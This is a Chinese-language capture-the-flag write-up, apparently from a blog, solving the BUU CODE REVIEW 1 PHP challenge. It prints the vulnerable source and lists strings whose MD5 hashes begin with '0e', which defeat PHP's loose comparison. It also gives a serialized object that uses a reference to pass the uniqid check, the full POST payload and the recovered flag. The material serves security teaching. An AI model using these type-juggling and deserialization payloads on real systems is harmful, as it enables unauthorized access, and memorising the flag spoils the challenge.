BUU CODE REVIEW 1
1
https://github.com/glzjin/buusec_2019_code_review_1
解法
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/10/6
* Time: 8:04 PM
*/
highlight_file(__FILE__);
class BUU {
public $correct = "";
public $input = "";
public function __destruct() {
try {
$this->correct = base64_encode(uniqid());
if($this->correct === $this->input) {
echo file_get_contents("/flag");
}
} catch (Exception $e) {
}
}
}
if($_GET['pleaseget'] === '1') {
if($_POST['pleasepost'] === '2') {
if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
unserialize($_POST['obj']);
}
}
}
GET 和 POST 参数的构造很简单,就不说了。
要使这个布尔运算结果为真,可以用 0e 绕过。0e 被解析为科学计数法,且0的任何正数次方都等于0。
md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']
找两个 MD5 值为 0e 开头的字符串作为参数:
QNKCDZO
240610708
byGcY
sonZ7y
aabg7XSs
aabC9RqS
s878926199a
s155964671a
s214587387a
s1091221200a
对于这个,uniqid() 会根据时间生成唯一ID,没有办法计算。
$this->correct = base64_encode(uniqid());
if($this->correct === $this->input) {
echo file_get_contents("/flag");
}
但是可以把 input 属性设为 correct 属性的引用,这样 $this->correct === $this->input 总是成立。写个 PHP 程序生成序列化对象。
<?php
class BUU {
public $correct = "";
public $input = "";
}
$buu = new BUU();
$buu->input = &$buu->correct;
echo serialize($buu);
?>
输出:
O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
发送 POST 请求到:
http://5bbdb33b-f4d9-463e-8bc9-df88c863b6f2.node5.buuoj.cn:81/?pleaseget=1
请求体:
pleasepost=2&md51=QNKCDZO&md52=s155964671a&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
取得 flag。
Flag
flag{02d8ed72-ad82-4829-a385-d0f2ae7a8ea0}
声明
本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规。
博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规,不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任。
1479
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
